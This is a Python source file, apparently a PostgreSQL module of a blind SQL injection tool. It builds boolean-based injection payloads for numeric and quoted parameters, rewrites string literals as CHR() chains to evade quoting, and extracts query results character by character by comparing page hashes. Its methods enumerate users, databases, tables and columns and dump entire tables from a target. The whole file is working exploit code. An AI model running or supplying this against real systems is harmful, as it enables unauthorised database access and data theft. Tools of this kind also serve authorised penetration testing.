#!/usr/bin/env python


import random
import re
import time

from common import Common


class PostgresMap(Common):
    __fingerprint            = ''
    __banner                 = ''
    __cached_dbs             = []
    __cached_tables          = {}
    __cached_columns         = {}


    def __unescape(self, expression):
        while True:
            index = expression.find("'")
            if index == -1:
                break

            first_index = index + 1
            index = expression[first_index:].find("'")

            if index == -1:
                raise Exception, "Unenclosed ' in '%s'" % expression

            last_index = first_index + index
            old = "'%s'" % expression[first_index:last_index]
            unescaped = "("

            for i in range(first_index, last_index):
                unescaped += "CHR(%d)" % (ord(expression[i]))
                if i < last_index - 1:
                    unescaped += "||"

            unescaped += ")"
            expression = expression.replace(old, unescaped)

        return expression


    def __create_stm(self):
        if self.args.injection_method == 'numeric':
            evil_stm  = " AND ASCII(SUBSTR((%s),%d,1)) > %d"
        elif self.args.injection_method == 'stringsingle':
            evil_stm  = "' AND ASCII(SUBSTR((%s),%d,1)) > %d AND '1"
        elif self.args.injection_method == 'stringdouble':
            evil_stm  = '" AND ASCII(SUBSTR((%s),%d,1)) > %d AND "1'

        return evil_stm


    def __get_value(self, expression):
        self.log("query: %s" % expression)
        expr = self.__unescape(expression)
        start = time.time()
        end = False
        count = 0
        i = 0
        value = ''

        evil_stm = self.__create_stm()
        base_url = self.url_replace_parameter(newvalue=evil_stm)

        while end != True:
            i = i + 1
            max = 127
            min = 0

            while (max - min) != 1:
                count += 1
                limit = ((max + min) / 2)

                evil_url = base_url % (expr, i, limit)
                evil_hash = self.hash_page(evil_url)

                if evil_hash == self.args.default_hash:
                    min = limit
                else:
                    max = limit

                if (max - min) == 1:
                    if max == 1:
                        end = True
                        break
                    val = chr(min+1)
                    value = value + val

        duration = int(time.time() - start)
        self.log("performed %d queries in %d seconds" % (count, duration))
        self.log("retrieved: %s" % value)

        return value


    def get_fingerprint(self):
        if self.__banner:
            version = re.search('^PostgreSQL ([\d\.]+)', self.__banner, re.I).groups()[0]
            return '%s (probably %s)' % (self.__fingerprint, version)
        else:
            return self.__fingerprint


    def get_banner(self):
        self.log("fetching banner")
        self.__banner = self.__get_value("version()")
        return self.__banner


    def get_current_db(self):
        self.log("fetching current database")
        self.__current_db = self.__get_value("current_database()")
        return self.__current_db


    def get_current_user(self):
        self.log("fetching current user")
        return self.__get_value("current_user")


    def get_users(self):
        self.log("fetching users")
        stm  = "SELECT count(distinct(usename)) "
        stm += "FROM pg_user"

        self.log("fetching number of database users")
        count = self.__get_value(stm)

        if not len(count) or count == "0":
            err_msg = "unable to retrieve the number of database users"
            raise Exception, err_msg

        users = []

        self.log("fetching database users")
        for index in range(int(count)):
            stm  = "SELECT distinct(usename) "
            stm += "FROM pg_user OFFSET %d LIMIT 1" % index

            user = self.__get_value(stm)
            users.append(user)

        if not users:
            raise Exception, "unable to retrieve the database users"

        return users


    def get_dbs(self):
        self.log("fetching number of databases")
        stm = "SELECT count(distinct(datname)) FROM pg_database"
        count = self.__get_value(stm)

        if not len(count) or count == "0":
            err_msg  = "unable to retrieve the number of databases"
            raise Exception, err_msg

        dbs = []

        self.log("fetching database names")
        for index in range(int(count)):
            stm  = "SELECT distinct(datname) "
            stm += "FROM pg_database OFFSET %d LIMIT 1" % index

            db = self.__get_value(stm)
            dbs.append(db)

        if dbs:
            self.__cached_dbs = dbs
        else:
            raise Exception, "unable to retrieve the database names"

        return dbs


    def get_tables(self):
        if self.args.db and self.args.db != 'public':
            self.args.db = 'public'
            warn_msg  = "PostgreSQL plugin can only enumerate "
            warn_msg += "tables from current database, also "
            warn_msg += "known as '%s'" % self.args.db
            self.warn(warn_msg)
        else:
            self.args.db = 'public'

        self.log("fetching number of tables for database '%s'" % self.args.db)
        stm  = "SELECT count(distinct(tablename)) FROM pg_tables "
        stm += "WHERE schemaname = '%s'" % self.args.db
        count = self.__get_value(stm)

        if not len(count) or count == "0":
            err_msg  = "unable to retrieve the number of "
            err_msg += "tables for database '%s'" % self.args.db
            raise Exception, err_msg

        db_tables = {}
        tables = []

        self.log("fetching tables for database '%s'" % self.args.db)
        for index in range(int(count)):
            stm  = "SELECT distinct(tablename) FROM pg_tables "
            stm += "WHERE schemaname = '%s' OFFSET %d LIMIT 1" % (self.args.db, index)

            table = self.__get_value(stm)
            tables.append(table)

        if tables:
            db_tables[self.args.db] = tables
        else:
            err_msg  = "unable to retrieve the tables "
            err_msg += "for database '%s'" % self.args.db
            raise Exception, err_msg

        self.__cached_tables = db_tables

        return db_tables


    def get_columns(self):
        if not self.args.table:
            raise Exception, "missing table parameter"
        else:
            stm  = "SELECT count(distinct(attname)) "
            stm += "FROM pg_attribute JOIN pg_class ON "
            stm += "pg_class.oid = pg_attribute.attrelid "

            if '.' in self.args.table:
                self.args.db, self.args.table = self.args.table.split('.')
            stm += "WHERE relname = '%s' AND attnum > 0" % self.args.table

        if self.args.db and self.args.db != 'public':
            self.args.db = 'public'
            warn_msg  = "PostgreSQL plugin can only enumerate "
            warn_msg += "columns from tables on current database, "
            warn_msg += "also known as '%s'" % self.args.db
            self.warn(warn_msg)
        else:
            self.args.db = 'public'

        self.log("fetching number of columns for table '%s' on current database" % self.args.table)
        count = self.__get_value(stm)

        if not len(count) or count == "0":
            err_msg  = "unable to retrieve the number of columns for "
            err_msg += "table '%s' on current database" % self.args.table
            raise Exception, err_msg

        db_table_columns = {}
        table = {}
        columns = {}

        self.log("fetching columns for table '%s' on current database" % self.args.table)
        for index in range(int(count)):
            stm  = "SELECT distinct(attname) "
            stm += "FROM pg_attribute JOIN pg_class ON "
            stm += "pg_class.oid = pg_attribute.attrelid "
            stm += "WHERE relname = '%s' AND attnum > 0 " % self.args.table
            stm += "OFFSET %d LIMIT 1" % index

            column = self.__get_value(stm)

            stm  = "SELECT atttypid "
            stm += "FROM pg_attribute JOIN pg_class ON "
            stm += "pg_class.oid = pg_attribute.attrelid "
            stm += "WHERE relname = '%s' " % self.args.table
            stm += "AND attname='%s'" % column

            coltype = self.__get_value(stm)
            columns[column] = coltype

        if columns:
            table[self.args.table] = columns
            db_table_columns[self.args.db] = table
        else:
            err_msg  = "unable to retrieve the columns for table "
            err_msg += "'%s' on current database" % self.args.table
            raise Exception, err_msg

        self.__cached_columns[self.args.table] = columns

        return db_table_columns


    def dump_table(self):
        if not self.args.table:
            raise Exception, "missing table parameter"

        if self.args.db and self.args.db != 'public':
            self.args.db = 'public'
            warn_msg  = "PostgreSQL plugin can only dump "
            warn_msg += "tables on current database, "
            warn_msg += "also known as '%s'" % self.args.db
            self.warn(warn_msg)

        if not self.__cached_columns:
            self.__cached_columns = self.get_columns()

        from_expr = "%s.%s" % (self.args.db, self.args.table)

        db_table_values = {}
        stm  = "SELECT count(*) FROM %s" % from_expr

        self.log("fetching number of rows for table '%s' on current database" % self.args.table)
        count = self.__get_value(stm)

        if not len(count) or count == "0":
            err_msg  = "unable to retrieve the number of rows for "
            err_msg += "table '%s' on current database" % self.args.table
            raise Exception, err_msg

        for column in self.__cached_columns[self.args.db][self.args.table].keys():
            length = 0
            values = []
            column_data = {}
            db_table_values[column] = {}

            self.log("fetching values of column '%s' for table '%s' on current database" %
                     (column, self.args.table))
            for index in range(int(count)):
                stm  = "SELECT %s FROM %s OFFSET %d LIMIT 1" % (column, from_expr, index)
                value = self.__get_value(stm)

                length = max(length, len(str(value)))
                values.append(value)

            if length < len(column):
                column_data['length'] = len(column)
            else:
                column_data['length'] = length
            column_data['values'] = values
            db_table_values[column] = column_data

        if db_table_values:
            infos = {}

            if self.args.db:
                infos['db'] = self.args.db
            else:
                infos['db'] = None
            infos['table'] = self.args.table
            infos['count'] = count

            db_table_values['__infos__'] = infos
        else:
            err_msg  = "unable to retrieve the values for "
            err_msg += "table '%s'" % self.args.table
            if self.args.db:
                err_msg += "on database '%s'" % self.args.db
            raise Exception, err_msg

        return db_table_values


    def get_file(self, filename):
        err_msg = "PostgreSQL plugin does not support file loading"
        raise Exception, err_msg


    def get_expression(self, expression):
        return self.__get_value(expression)


    def check_dbms(self):
        self.log("testing PostgreSQL")
        random_int = str(random.randint(1, 9))
        stm = "SELECT COALESCE(%s, NULL)" % random_int

        if self.__get_value(stm) == random_int:
            self.__fingerprint = 'PostgreSQL'
            return True
        else:
            self.warn("remote DBMS is not PostgreSQL")
            return False


    def __init__(self, args):
        self.args = args
